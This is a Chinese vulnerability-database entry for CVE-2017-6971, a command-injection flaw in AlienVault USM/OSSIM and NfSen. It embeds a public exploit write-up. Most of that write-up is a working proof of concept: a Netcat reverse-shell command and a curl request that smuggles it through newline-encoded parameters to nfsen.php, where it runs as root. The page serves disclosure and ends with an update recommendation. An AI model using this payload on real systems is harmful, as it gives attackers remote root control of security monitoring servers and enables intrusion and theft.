AlienVault USM、OSSIM和NfSen 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1124095 漏洞类型 注入
发布时间 2017-07-10 更新时间 2019-10-23
CVE编号 CVE-2017-6971 CNNVD-ID CNNVD-201703-1003
漏洞平台 Linux CVSS评分 9.0
AlienVault USM和OSSIM都是美国AlienVault公司的产品。USM是一套提供了安全监控、安全事件管理和报告、威胁感知系统等功能的安全管理平台。OSSIM是一套开源的安全信息管理系统。NfSen是一个nfdump(一款开源的netflow收集、存储、过滤、统计分析工具)的基于Web的前端。 AlienVault USM和OSSIM 5.3.4及之前的版本和NfSen 1.3.8之前的版本中存在安全漏洞。远程攻击者可利用该漏洞执行任意命令。
# Exploit Title: NfSen/AlienVault remote root exploit (IPC query command injection)
# Version: NfSen 1.3.6p1, 1.3.7 and 1.3.7-1~bpo80+1_all. Previous versions are also likely to be affected.
# Version: AlienVault 5.3.4
# Date: 2017-07-10
# Vendor Homepage:
# Vendor Homepage:
# Software Link:
# Exploit Author: Paul Taylor / Foregenix Ltd
# Website:
# Tested on: AlienVault USM 5.3.4
# CVE: CVE-2017-6971
1. Description

A remote authenticated attacker (or an attacker with a stolen PHP Session ID) can gain complete control over the system by sending a crafted request containing control characters and shell commands which will be executed as root on a vulnerable system.

2. Proof of Concept
# From a linux bash prompt on the attacker's machine:

# Set target IP

# Set desired command to inject (in this case a reverse shell, using Netcat which is conveniently available on an AlienVault USM All-In-One):
cmd='nc -ne /bin/bash 443';

# Set the PHPSESSID of an authenticated session which has *already* submitted at least one valid NfSen query for processing via the Web UI.

# Next use curl to send the exploit
curl -o /dev/null -s -k -b "PHPSESSID=$PHPSESSID" -d "process=Process&output=custom+...&customfmt=%0A.%0Arun-nfdump%0Aargs=-h; $cmd #" https://$targetip/ossim/nfsen/nfsen.php

3. Solution:

Update to latest version of NfSen/USM/OSSIM